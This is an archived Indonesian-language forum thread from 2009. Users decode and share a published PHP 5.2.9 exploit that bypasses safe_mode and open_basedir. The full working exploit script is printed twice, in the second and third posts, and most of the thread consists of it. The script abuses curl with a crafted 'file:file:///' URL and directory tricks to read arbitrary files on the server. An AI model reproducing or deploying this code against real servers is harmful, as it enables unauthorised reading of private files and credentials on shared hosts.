PDA

View Full Version : PHP 5.2.9 curl safe_mode & open_basedir bypass

trash.metal.attack
04-11-2009, 03:03 PM
weks baru mau bljr buat di localhost pake php 5.2.9 pas buka rootsecure.net dah ada ini
http://securityreason.com/achievement_securityalert/61
exploit :
http://securityreason.com/achievement_exploitalert/11

btw tuh ada yg tau gk encrpt yg dia pake mau coba decrypt nih...binun mau liat scrip exploitnya... $freiheit=fopen('./cx529.php', 'w'); :nokomen:
petunia
04-16-2009, 06:51 AM
keliatan bangetkan ada tulisan base64
<?php
/*
safe_mode and open_basedir Bypass PHP 5.2.9
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

NOTE:
http://securityreason.com/achievement_securityalert/61

EXPLOIT:
http://securityreason.com/achievement_exploitalert/10
*/

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];

echo '<PRE><P>This is exploit from <a
href="http://securityreason.com/" title="SecurityAudit">Security Audit - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.9 safe_mode & open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>';


$level=0;

if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);

?>
trash.metal.attack
04-19-2009, 02:32 PM
keliatan bangetkan ada tulisan base64
<?php
/*
safe_mode and open_basedir Bypass PHP 5.2.9
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

NOTE:
http://securityreason.com/achievement_securityalert/61

EXPLOIT:
http://securityreason.com/achievement_exploitalert/10
*/

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];

echo '<PRE><P>This is exploit from <a
href="http://securityreason.com/" title="SecurityAudit">Security Audit - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.9 safe_mode & open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>';


$level=0;

if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);

?>

wah makasi kakak....gitu ya cara liatnya..:madesu: